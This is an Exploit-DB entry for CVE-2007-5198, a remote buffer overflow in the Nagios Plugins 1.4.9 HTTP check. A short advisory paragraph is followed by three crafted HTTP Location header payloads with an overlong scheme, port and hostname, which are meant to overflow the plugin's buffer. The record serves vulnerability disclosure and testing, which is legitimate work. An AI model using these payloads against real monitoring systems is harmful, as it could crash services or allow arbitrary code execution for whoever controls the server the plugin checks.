Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability

2007-07-16T00:00:00
ID EDB-ID:30646
Type exploitdb
Reporter Nobuhiro Ban
Modified 2007-07-16T00:00:00

Description

Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability. CVE-2007-5198. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/25952/info

Nagios Plugins are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software.

This issue affects Nagios Plugins 1.4.9; other versions may also be vulnerable. 

Location: htttttttttttttttttttttttttttttttttttttttttttp://example.com/

Location: http://example.com:1234567890123456789012345678901234567890/

Location:
http://tooooooooooooooooooooooooooooooooooooooooooooooooooo.loooooooooooooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.looooooooo
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.loooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.
loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oong.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
ooooooong.loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oooooooooooong.host-name.example.com/